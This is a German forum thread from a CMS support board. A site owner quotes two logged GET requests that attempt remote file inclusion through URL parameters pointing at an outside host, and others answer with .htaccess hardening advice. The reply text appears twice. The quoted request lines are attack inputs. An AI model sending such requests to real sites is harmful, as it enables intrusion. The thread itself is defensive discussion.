Hi zusammen...
ich habe vor kurzem entdeckt, dass Abfragen der Art ....
GET //?_SERVER[DOCUMENT_ROOT]=_EINE_HTTP_ADDRESSE_/Text/fileText/id1.txt?? HTTP/1.1 oder
GET //templates/default///?page=_EINE_HTTP_ADDRESSE_/extend/data/sc1??? HTTP/1.1 HTTP/1.1
stattgefunden haben. Leider verstehe ich hier nur Bahnhof bzw. jedenfalls ist einer der
Addressen von "EINE_HTTP_ADDRESSE" definitiv gehackt worden.
Muss ich mir hier irgendwie Sorgen machen und wenn ja, was kann man dagegen tun?
Viele Grüße
Sicherheitsnachfrage in Bezug auf GET Eintrag in Logfile Topic is solved
-
NaN
Re: Sicherheitsnachfrage in Bezug auf GET Eintrag in Logfile
Security Thread umsetzen: http://forum.cmsmadesimple.org/index.ph ... 737.0.html
In diesem Falle speziell Punkt 5 (derartige Anfragen mittels .htaccess Dateien unterbinden).
In diesem Falle speziell Punkt 5 (derartige Anfragen mittels .htaccess Dateien unterbinden).
-
maninweb
Re: Sicherheitsnachfrage in Bezug auf GET Eintrag in Logfile
Hi NaN...
Danke, das habe/hatte ich in Bezug auf das CMSMS schon drin
Wenn ich das oben mal dummy mäßig teste, erhalte ich, wie ich jetzt weiss, den Fehler 410;
also "Gone ... The requested resource ... is no longer available..." Hatte zuerst gedacht, das
würde was bedeuten und erst später rausgefunden, dass es sich um 410 handelt.
Unabhängig davon, für die die hier mal lesen und neu bei CMSMS sind, ich kann's echt nur empfehlen,
die htaccess anzulegen; wie von NaN verlinkt.
Gruß und schönen Ostermontag.
Danke, das habe/hatte ich in Bezug auf das CMSMS schon drin
Wenn ich das oben mal dummy mäßig teste, erhalte ich, wie ich jetzt weiss, den Fehler 410;
also "Gone ... The requested resource ... is no longer available..." Hatte zuerst gedacht, das
würde was bedeuten und erst später rausgefunden, dass es sich um 410 handelt.
Unabhängig davon, für die die hier mal lesen und neu bei CMSMS sind, ich kann's echt nur empfehlen,
die htaccess anzulegen; wie von NaN verlinkt.
Gruß und schönen Ostermontag.
